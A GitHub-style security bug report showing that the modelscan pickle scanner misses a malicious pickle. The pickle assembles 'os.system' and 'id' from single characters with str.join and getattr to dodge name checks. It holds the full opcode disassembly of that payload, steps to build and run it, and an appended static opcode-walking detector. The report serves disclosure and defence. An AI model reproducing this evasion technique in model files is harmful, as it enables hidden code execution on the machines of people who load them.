[BUG] Security Vulnerability #331

@nier0x00

Describe the bug
Modelscan scanned a malicious pickle file using defaults and reported no issues.

To Reproduce
Steps to reproduce the behavior:
The disassembly of the malicious file looks like this:

    0: \x80 PROTO      4
    2: \x95 FRAME      240
   11: \x8c SHORT_BINUNICODE 'importlib'
   22: \x8c SHORT_BINUNICODE 'import_module'
   37: \x93 STACK_GLOBAL
   38: \x94 MEMOIZE    (as 0)
   39: \x8c SHORT_BINUNICODE 'builtins'
   49: \x85 TUPLE1
   50: R    REDUCE
   51: \x94 MEMOIZE    (as 1)
   52: \x8c SHORT_BINUNICODE 'builtins'
   62: \x8c SHORT_BINUNICODE 'getattr'
   71: \x93 STACK_GLOBAL
   72: \x94 MEMOIZE    (as 2)
   73: h    BINGET     2
   75: h    BINGET     1
   77: \x8c SHORT_BINUNICODE 'str'
   82: \x86 TUPLE2
   83: R    REDUCE
   84: \x8c SHORT_BINUNICODE 'join'
   90: \x86 TUPLE2
   91: R    REDUCE
   92: \x8c SHORT_BINUNICODE ''
   94: ]    EMPTY_LIST
   95: (    MARK
   96: \x8c     SHORT_BINUNICODE 'o'
   99: \x8c     SHORT_BINUNICODE 's'
  102: e        APPENDS    (MARK at 95)
  103: \x86 TUPLE2
  104: R    REDUCE
  105: \x94 MEMOIZE    (as 3)
  106: h    BINGET     2
  108: h    BINGET     2
  110: h    BINGET     1
  112: \x8c SHORT_BINUNICODE 'str'
  117: \x86 TUPLE2
  118: R    REDUCE
  119: \x8c SHORT_BINUNICODE 'join'
  125: \x86 TUPLE2
  126: R    REDUCE
  127: \x8c SHORT_BINUNICODE ''
  129: ]    EMPTY_LIST
  130: (    MARK
  131: \x8c     SHORT_BINUNICODE 's'
  134: \x8c     SHORT_BINUNICODE 'y'
  137: \x8c     SHORT_BINUNICODE 's'
  140: \x8c     SHORT_BINUNICODE 't'
  143: \x8c     SHORT_BINUNICODE 'e'
  146: \x8c     SHORT_BINUNICODE 'm'
  149: e        APPENDS    (MARK at 130)
  150: \x86 TUPLE2
  151: R    REDUCE
  152: \x94 MEMOIZE    (as 4)
  153: h    BINGET     2
  155: h    BINGET     2
  157: h    BINGET     1
  159: \x8c SHORT_BINUNICODE 'str'
  164: \x86 TUPLE2
  165: R    REDUCE
  166: \x8c SHORT_BINUNICODE 'join'
  172: \x86 TUPLE2
  173: R    REDUCE
  174: \x8c SHORT_BINUNICODE ''
  176: ]    EMPTY_LIST
  177: (    MARK
  178: \x8c     SHORT_BINUNICODE 'i'
  181: \x8c     SHORT_BINUNICODE 'd'
  184: e        APPENDS    (MARK at 177)
  185: \x86 TUPLE2
  186: R    REDUCE
  187: \x94 MEMOIZE    (as 5)
  188: h    BINGET     2
  190: h    BINGET     1
  192: \x8c SHORT_BINUNICODE 'getattr'
  201: \x86 TUPLE2
  202: R    REDUCE
  203: \x8c SHORT_BINUNICODE 'builtins'
  213: \x8c SHORT_BINUNICODE '__import__'
  225: \x93 STACK_GLOBAL
  226: \x94 MEMOIZE    (as 6)
  227: \x94 MEMOIZE    (as 7)
  228: h    BINGET     3
  230: \x85 TUPLE1
  231: R    REDUCE
  232: h    BINGET     4
  234: \x86 TUPLE2
  235: R    REDUCE
  236: h    BINGET     5
  238: \x85 TUPLE1
  239: R    REDUCE
  240: \x94 MEMOIZE    (as 8)
  241: \x8c SHORT_BINUNICODE 'gottem'
  249: \x94 MEMOIZE    (as 9)
  250: b    BUILD
  251: .    STOP

1. Run echo "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" | xxd -r > str_concat_bypass.pkl
2. Run python3 -m pickle str_concat_bypass.pkl and the output for the id command should be displayed in stdout.
3. Run modelscan -p str_concat_bypass.pkl to see that no issues were found.

Expected behavior
Modelscan reports the following on this file:

--- Summary ---

Total Issues: 2

Total Issues By Severity:

    - LOW: 0
    - MEDIUM: 0
    - HIGH: 0
    - CRITICAL: 2

--- Issues by Severity ---

--- CRITICAL ---

Unsafe operator found:
  - Severity: CRITICAL
  - Description: Use of unsafe operator '__import__' from module 'builtins'
  - Source: <path>/string_concat_bypass.pkl

Unsafe operator found:
  - Severity: CRITICAL
  - Description: Use of unsafe operator 'getattr' from module 'builtins'
  - Source: <path>/string_concat_bypass.pkl

However, os.system('id') is not caught since this string is split up before it's merged using str.join.

Environment (please complete the following information):

  • OS: Debian Linux
  • Modelscan Version 0.8.7
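
An added example, not part of the original report and not modelscan's code: a static walk over the opcode stream (nothing is unpickled) that reports named imports and, separately, every REDUCE whose callable is the result of an earlier call rather than a named global, which is how the final call target in the disassembly above stays out of any import list. It models only GLOBAL, STACK_GLOBAL, REDUCE and the memo opcodes; `scan`, `RESOLVERS` and the benign constructed samples are assumptions of this example.

```python
import pickle
import pickletools

# Callables that resolve names at load time; their results never appear in a GLOBAL opcode.
RESOLVERS = {("builtins", "getattr"), ("builtins", "__import__"), ("importlib", "import_module")}
MARK = object()  # stack sentinel for the MARK opcode

def scan(data: bytes) -> dict:
    """Walk the opcodes without unpickling; report imports and computed call targets."""
    stack, memo = [], {}
    report = {"globals": [], "resolver_calls": [], "computed_calls": []}
    pop = lambda: stack.pop() if stack else None
    for op, arg, pos in pickletools.genops(data):
        before, after = list(op.stack_before), op.stack_after
        if op.name in ("GLOBAL", "STACK_GLOBAL"):
            # STACK_GLOBAL takes name (top) and module from the stack; GLOBAL carries "module name".
            name, module = (pop(), pop()) if op.name == "STACK_GLOBAL" else arg.split(" ", 1)[::-1]
            literal = isinstance(module, str) and isinstance(name, str)
            report["globals"].append(f"{module}.{name}" if literal else f"<computed@{pos}>")
            stack.append((module, name) if literal else None)
        elif op.name == "REDUCE":
            _args, target = pop(), pop()
            if target in RESOLVERS:
                report["resolver_calls"].append(pos)
            elif not isinstance(target, tuple):
                report["computed_calls"].append(pos)  # callable only exists at load time
            stack.append(None)  # the call result is unknown statically
        elif op.name in ("MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"):
            memo[len(memo) if arg is None else arg] = stack[-1] if stack else None
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            stack.append(memo.get(arg))
        elif op.name == "MARK":
            stack.append(MARK)
        else:  # generic stack effect taken from pickletools' opcode table
            if pickletools.markobject in before:
                while stack and stack.pop() is not MARK:
                    pass
                before = before[:before.index(pickletools.markobject)]
            for _ in before:
                pop()
            stack.extend([arg if after == [pickletools.pyunicode] else None] * len(after))
    return report

class _JoinSample:  # constructed, benign: pickles as getattr('', 'join') called on ['a', 'b']
    def __reduce__(self):
        return ("".join, (["a", "b"],))

SAMPLE = pickle.dumps(_JoinSample(), protocol=4)  # analysed only, never loaded
CLEAN = pickle.dumps({"weights": [1.0, 2.0]}, protocol=4)
```

A non-empty `resolver_calls` or `computed_calls` list means the file invokes something a name-based import check cannot identify, so a loader policy can reject it without knowing what the assembled name is.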
